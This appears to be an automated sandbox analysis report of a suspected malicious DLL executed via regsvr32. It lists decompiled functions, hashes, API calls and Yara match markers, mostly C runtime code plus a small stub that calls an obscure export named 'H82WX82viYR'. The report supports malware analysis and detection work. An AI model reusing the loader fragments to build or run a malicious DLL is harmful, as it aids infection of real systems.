                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _calloc_dbg$__initmbctable_invalid_parameter_invoke_watson_if_error
                                • String ID: 0*/$_setenvp$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\stdenvp.c$strcpy_s(*env, cchars, p)$~
                                • API String ID: 1648969265-474309611
                                • Opcode ID: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                • Instruction ID: dee10c55842e2b838f4c2249843f6d7af4c066fce2f7611d1afded1b25fdeaa1
                                • Opcode Fuzzy Hash: 1267f019c7e433370f87e7d76307e13ae481beb469170db0d9b2813ec215c0ca
                                • Instruction Fuzzy Hash: D0514F31A1CA8682EB90CB19E88576E77E0F385794F704126EACE477B4DB7EE4408B51
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27280 Relevance: 12.1, APIs: 8, Instructions: 104COMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Pointer$Decode$_initterm$EncodeExitProcess__crt
                                • String ID:
                                • API String ID: 3799933513-0
                                • Opcode ID: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                • Instruction ID: 37cfb5e84e154ae2fbcc5f75e30e47dd1cf7b4373ba061ec72f9a9691eeac49a
                                • Opcode Fuzzy Hash: c9a1689ff4177d35e5a558f0089bed0cb41f7669401f9128f576ef3edf69137f
                                • Instruction Fuzzy Hash: 36511C3291DB4281E6A09B58EC8436EB7E0F386794F315125EACD427B9DF7EE544CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D28670 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79COMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\a_env.c
                                • API String ID: 1823725401-2473407871
                                • Opcode ID: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                • Instruction ID: ccbee8cdd8044984a813dbfd6c9bb6ca90d3427a1697cce954f0caea4fdd0345
                                • Opcode Fuzzy Hash: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                • Instruction Fuzzy Hash: 8B41A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47B68DBBED4548B00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D23D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                  • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                  • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                  • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                  • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                • API String ID: 3828364660-3898981997
                                • Opcode ID: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                • Instruction ID: b9f7c2a4cabba63d90327ac94b1883ffc0a3f64b25b31a8ae36976c45a874ec4
                                • Opcode Fuzzy Hash: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                • Instruction Fuzzy Hash: 37115E30A2D60286F3E0AB29ED4577DA6E1B784B60F214275E9EE422F5DB2FE4048601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2461B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
				signed int _t64;
				intOrPtr _t66;
				void* _t73;
				void* _t92;
				long long _t98;
				long long _t113;
				long long _t114;
				long long _t115;
				long long _t130;
				intOrPtr _t132;
				long long _t135;

				if (_a136 == 1) goto 0xf9d24672;
				_t64 = _a136 & 0x0000ffff;
				if (_t64 == 2) goto 0xf9d24672;
				if (_a136 == 3) goto 0xf9d24672;
				_a40 = "Error: memory allocation: bad memory block type.\n";
				_a32 = "%s";
				r9d = 0;
				r8d = 0;
				0xf9d2ad00();
				if (_t64 != 1) goto 0xf9d24672;
				asm("int3");
				_t98 = _a128 + 0x34;
				_a96 = _t98;
				0xf9d2ac90(); // executed
				_a80 = _t98;
				if (_a80 != 0) goto 0xf9d246b8;
				if (_a160 == 0) goto 0xf9d246b3;
				 *_a160 = 0xc;
				goto 0xf9d248b4;
				_t66 =  *0xf9d4b03c; // 0x38
				 *0xf9d4b03c = _t66 + 1;
				if (_a64 == 0) goto 0xf9d2472d;
				 *_a80 = 0;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = 0;
				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = 3;
				 *((intOrPtr*)(_a80 + 0x28)) = 0;
				goto 0xf9d24844;
				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
				_t130 =  *0xf9d4c960; // 0x42cc
				 *0xf9d4c960 = _t130 + _a128;
				goto 0xf9d2476e;
				 *0xf9d4c960 = 0xffffffff;
				_t132 =  *0xf9d4c990; // 0xa0c
				 *0xf9d4c990 = _t132 + _a128;
				_t113 =  *0xf9d4c978; // 0x32f4
				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
				if (_t92 <= 0) goto 0xf9d247a8;
				_t114 =  *0xf9d4c990; // 0xa0c
				 *0xf9d4c978 = _t114;
				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
				_t115 =  *0xf9d4c980; // 0x2f3b00
				 *((long long*)(_t115 + 8)) = _a80;
				goto 0xf9d247d0;
				 *0xf9d4c968 = _a80;
				_t135 =  *0xf9d4c980; // 0x2f3b00
				 *_a80 = _t135;
				 *((long long*)(_a80 + 8)) = 0;
				 *((long long*)(_a80 + 0x10)) = _a144;
				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
				 *((long long*)(_a80 + 0x20)) = _a128;
				 *(_a80 + 0x1c) = _a136;
				_t78 = _a88;
				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
				 *0xf9d4c980 = _a80;
				r8d = 4;
				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
				_t145 = _a128;
				r8d = 4;
				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
				_a72 = _a80 + 0x30;
				return E000007FE7FEF9D29360(_t73, 4);
			}














                                0x7fef9d24623
                                0x7fef9d2462c
                                0x7fef9d24634
                                0x7fef9d2463e
                                0x7fef9d24647
                                0x7fef9d24653
                                0x7fef9d24658
                                0x7fef9d2465b
                                0x7fef9d24665
                                0x7fef9d2466d
                                0x7fef9d2466f
                                0x7fef9d2467a
                                0x7fef9d2467e
                                0x7fef9d24688
                                0x7fef9d2468d
                                0x7fef9d24698
                                0x7fef9d246a3
                                0x7fef9d246ad
                                0x7fef9d246b3
                                0x7fef9d246b8
                                0x7fef9d246c0
                                0x7fef9d246cb
                                0x7fef9d246d2
                                0x7fef9d246de
                                0x7fef9d246eb
                                0x7fef9d246f8
                                0x7fef9d2470c
                                0x7fef9d24715
                                0x7fef9d24721
                                0x7fef9d24728
                                0x7fef9d24743
                                0x7fef9d2474d
                                0x7fef9d2475a
                                0x7fef9d24761
                                0x7fef9d24763
                                0x7fef9d24776
                                0x7fef9d24783
                                0x7fef9d2478a
                                0x7fef9d24791
                                0x7fef9d24798
                                0x7fef9d2479a
                                0x7fef9d247a1
                                0x7fef9d247b0
                                0x7fef9d247b2
                                0x7fef9d247be
                                0x7fef9d247c2
                                0x7fef9d247c9
                                0x7fef9d247d5
                                0x7fef9d247dc
                                0x7fef9d247e4
                                0x7fef9d247f9
                                0x7fef9d24809
                                0x7fef9d24819
                                0x7fef9d24829
                                0x7fef9d24831
                                0x7fef9d24835
                                0x7fef9d2483d
                                0x7fef9d24854
                                0x7fef9d2485c
                                0x7fef9d2486d
                                0x7fef9d2487a
                                0x7fef9d24882
                                0x7fef9d248a1
                                0x7fef9d248af
                                0x7fef9d248c7

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _unlock
                                • String ID: Error: memory allocation: bad memory block type.
                                • API String ID: 2480363372-1537269110
                                • Opcode ID: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                • Instruction ID: 5caffd3b8bb6e9a751bf86ff06ba01468230100948e3856d22c691b184e429db
                                • Opcode Fuzzy Hash: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                • Instruction Fuzzy Hash: 6B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D26FF2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer_initterm_e
                                • String ID: Y
                                • API String ID: 1618838664-1754117475
                                • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D23110 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 8COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E000007FE7FEF9D23110(void* __eflags, long long* __rax) {
				void* _t7;
				intOrPtr _t8;
				void* _t10;

				_t8 =  *0xf9d4c3c8; // 0x180000000
				E000007FE7FEF9D211E0(_t7, _t8, "H82WX82viYR", _t10); // executed
				 *__rax(); // executed
				return 0;
			}






                                0x7fef9d23114
                                0x7fef9d23122
                                0x7fef9d23127
                                0x7fef9d2312f

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExitProcessUser
                                • String ID: H82WX82viYR
                                • API String ID: 3902816426-3887106525
                                • Opcode ID: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                • Instruction ID: 3c31bc9bae0aa088b32ec31719daf081635377c5f01f1f7dd7abf53af6b9f495
                                • Opcode Fuzzy Hash: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                • Instruction Fuzzy Hash: 0DC04C11F2550381EA4467E6AC861AC12A16785790FA19421D55C86231DE6E92964B02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D27540 Relevance: 3.0, APIs: 2, Instructions: 17COMMON
                                Download Yara Rule
                                C-Code - Quality: 62%
                                			E000007FE7FEF9D27540(long long __rax) {
				long long _v24;
				void* _t8;
				void* _t9;

				_t16 = __rax;
				_t9 = E000007FE7FEF9D23D00(_t8); // executed
				_v24 = __rax;
				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
			}






                                0x7fef9d27540
                                0x7fef9d27544
                                0x7fef9d27549
                                0x7fef9d2758e

                                APIs
                                  • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                  • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                • String ID:
                                • API String ID: 2678799220-0
                                • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2ACA8 Relevance: 3.0, APIs: 2, Instructions: 15memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ExitProcess$AllocateHeap__crt
                                • String ID:
                                • API String ID: 4215626177-0
                                • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800178A8 Relevance: 1.6, APIs: 1, Instructions: 122processCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                • Instruction ID: 2da17281d2a08d1ac9b8a996dbaf27e8716b5e9a88d25284efbd0f172fd1731a
                                • Opcode Fuzzy Hash: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                • Instruction Fuzzy Hash: 7041417051CB848FDBB8DF18E48979AB7E0FB88314F104A5DE48EC7245DB749885CB86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D24399 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {

				_a48 = __rax;
				if (_a48 == 0) goto 0xf9d243ad;
				goto 0xf9d243f5;
				if (_a88 != 0) goto 0xf9d243ce;
				if (_a120 == 0) goto 0xf9d243c7;
				 *_a120 = 0xc;
				goto 0xf9d243f5;
				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
				if (_a120 == 0) goto 0xf9d243ef;
				 *_a120 = 0xc;
				goto 0xf9d243f5;
				goto 0xf9d24377;
				return 0;
			}



                                0x7fef9d24399
                                0x7fef9d243a4
                                0x7fef9d243ab
                                0x7fef9d243b2
                                0x7fef9d243ba
                                0x7fef9d243c1
                                0x7fef9d243cc
                                0x7fef9d243da
                                0x7fef9d243e2
                                0x7fef9d243e9
                                0x7fef9d243f1
                                0x7fef9d243f3
                                0x7fef9d243f9

                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D23471 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _ioterm
                                • String ID:
                                • API String ID: 4163092671-0
                                • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D23433 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                Download Yara Rule
                                APIs
                                • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                  • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                  • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                  • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                  • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                • String ID:
                                • API String ID: 1508997487-0
                                • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D288D0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DestroyHeap
                                • String ID:
                                • API String ID: 2435110975-0
                                • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D23D00 Relevance: 1.5, APIs: 1, Instructions: 5COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
